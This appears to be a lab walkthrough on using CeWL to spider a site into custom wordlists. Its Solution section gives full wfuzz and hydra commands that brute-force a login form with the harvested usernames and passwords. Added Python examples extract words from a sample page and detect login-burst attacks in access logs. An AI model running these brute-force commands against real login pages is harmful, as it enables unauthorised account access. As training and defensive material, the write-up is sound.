[Day 4] Brute-forcing Baby, it's CeWLd outside
Learning Objectives
What is CeWL?
What are the capabilities of CeWL?
How can we leverage CeWL to generate a custom wordlist from a website?
How can we customise the tool's output for specific tasks?
Overview
CeWL (pronounced "cool") is a custom word list generator tool that spiders websites to create word lists based on the site's content. Spidering, in the context of web security and penetration testing, refers to the process of automatically navigating and cataloguing a website's content, often to retrieve the site structure, content, and other relevant details. This capability makes CeWL especially valuable to penetration testers aiming to brute-force login pages or uncover hidden directories using organisation-specific terminology.
Beyond simple wordlist generation, CeWL can also compile a list of email addresses or usernames identified in team members' page links. Such data can then serve as potential usernames in brute-force operations.
How To Customise the Output for Specific Tasks
CeWL provides a lot of options that allow you to tailor the wordlist to your needs:
Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For example, to spider two links deep:
cewl http://10.10.253.172 -d 2 -w output1.txt
Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters:
cewl http://10.10.253.172 -m 5 -x 10 -w output2.txt
Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.
Custom extensions: The --with-numbers option will append numbers to words, and using --extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.
Follow external links: By default, CeWL doesn't spider external sites, but using the --offsite option allows you to do so.
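To see concretely what the length, case and number options do, here is a small Python word extractor added for illustration; it is not CeWL's code and only approximates CeWL's tokenising (it splits page text on non-letters, or on non-alphanumerics when numbers are allowed, and skips script and style bodies). The HTML page is constructed inline, and the parameter names min_len, max_len, lowercase and with_numbers are this example's own, standing in for -m, -x, --lowercase and --with-numbers. One caveat: cewl --help describes --with-numbers as accepting words that contain digits, and that is the behaviour implemented here.

```python
"""Mini CeWL-style word extractor (added illustration, not CeWL's code)."""
import re
from html.parser import HTMLParser

# Constructed sample page; the names and words are invented for this example.
SAMPLE_HTML = """
<html><head><title>Frosty Logistics Staff Portal</title>
<style>body { color: red; }</style></head>
<body>
<h1>Welcome to the Employee Portal</h1>
<p>Our Sleigh Ops team ships Gift2023 orders every December.</p>
<script>var x = "ignoreme";</script>
<ul><li>Alicia Frost</li><li>Bobby Snow</li></ul>
</body></html>
"""


class TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def extract_words(html, min_len=3, max_len=None, lowercase=False, with_numbers=False):
    """Return unique words from the page text in first-seen order.

    min_len / max_len mirror cewl -m / -x (CeWL's default minimum is 3).
    lowercase mirrors --lowercase.
    with_numbers mirrors --with-numbers as cewl --help describes it:
    tokens containing digits are kept as one word instead of being split
    on the digits (assumption: CeWL's exact tokeniser may differ).
    """
    parser = TextExtractor()
    parser.feed(html)
    text = " ".join(parser.chunks)
    token_re = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    seen, words = set(), []
    for tok in re.findall(token_re, text):
        if lowercase:
            tok = tok.lower()
        if len(tok) < min_len or (max_len is not None and len(tok) > max_len):
            continue
        if tok not in seen:
            seen.add(tok)
            words.append(tok)
    return words


if __name__ == "__main__":
    print("default       :", extract_words(SAMPLE_HTML))
    print("-m 5 -x 6     :", extract_words(SAMPLE_HTML, min_len=5, max_len=6))
    print("--with-numbers:", extract_words(SAMPLE_HTML, with_numbers=True))
    print("--lowercase   :", extract_words(SAMPLE_HTML, lowercase=True))
```

Running it shows why site content is a poor password source: the staff names and product words on the page fall straight into the 5-to-6 character list, and the with_numbers run keeps "Gift2023" intact while the default run reduces it to "Gift".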
Solution
Visiting the page, we find some useful information: a link to the employee portal, and a set of "magic words" that might be used as passwords.
Assume the password is at least 5 characters long and use a spidering depth of 2 (as given in the example).
cewl -d 2 -m 5 -w passwords.txt http://IP --with-numbers
We also have a page listing employee names, which are at most 6 characters long.
cewl -d 0 -m 5 -w usernames.txt http://IP/team.php --lowercase
We have username and password lists. Instead of using hydra, this time I will use wfuzz.
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://IP/login.php -d "username=FUZZ&password=FUZ2Z"
-z: loads a payload; the syntax is type,name (here file,<filename>).
--hs: hides responses containing the given string, i.e. the prompt shown on every failed attempt.
-u: the target URL.
-d: the POST data being sent (FUZZ and FUZ2Z are replaced by the first and second payloads).
Hydra attack:
hydra -L usernames.txt -P passwords.txt -f -v IP http-post-form "/login.php:username=^USER^&password=^PASS^:Please enter the correct credentials"
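From the defender's side, the wfuzz and hydra runs above produce a burst of POST requests to /login.php from one source in a short time, and since the failed-login response is recognised by its prompt text rather than by a distinct status code, counting request rate is a more robust signal than filtering on status. The following Python sketch is added here and is not part of the original writeup: it parses Apache combined-format access log lines and flags any source IP that POSTs to the login path at least threshold times within a sliding window. The log lines, IP addresses and User-Agent strings are all constructed for the example, and the function assumes each source's lines arrive in chronological order.

```python
"""Detect login brute-force bursts in access logs (added example, constructed data)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" format: ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_login_bursts(lines, path="/login.php", threshold=10, window_seconds=60):
    """Return {ip: peak_count} for sources that POSTed to `path` at least
    `threshold` times within any `window_seconds`-long sliding window.

    Status codes are deliberately ignored: a login form that answers every
    failure with the same status as a success gives nothing to filter on.
    """
    recent = defaultdict(deque)  # per-IP timestamps inside the current window
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop timestamps that fell out of the window
        if len(q) >= threshold:
            peaks[rec["ip"]] = max(peaks.get(rec["ip"], 0), len(q))
    return peaks


def _line(ip, ts, method, path, status, ua):
    """Build a constructed combined-format log line."""
    return (f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 '
            f'"http://portal.example/login.php" "{ua}"')


# Constructed sample log: one ordinary user (two logins, minutes apart)
# and one source firing twelve POSTs in twelve seconds, as a wordlist
# attack against the form would.
SAMPLE_LOG = [
    _line("192.168.1.20", "04/Dec/2023:10:00:00 +0000", "GET", "/login.php", 200, "Mozilla/5.0"),
    _line("192.168.1.20", "04/Dec/2023:10:00:30 +0000", "POST", "/login.php", 200, "Mozilla/5.0"),
    _line("192.168.1.20", "04/Dec/2023:10:09:10 +0000", "POST", "/login.php", 302, "Mozilla/5.0"),
] + [
    _line("10.10.10.5", f"04/Dec/2023:10:15:{s:02d} +0000", "POST", "/login.php", 200, "constructed-ua")
    for s in range(12)
]


if __name__ == "__main__":
    for ip, count in find_login_bursts(SAMPLE_LOG, threshold=10, window_seconds=60).items():
        print(f"{ip}: {count} POSTs to /login.php within 60s")
```

The threshold and window are the tuning knobs: a real deployment would set them from the site's normal login rate, and would pair this rate check with per-account lockout or throttling on the application side, which is the control that actually stops the wordlist from being tried to completion.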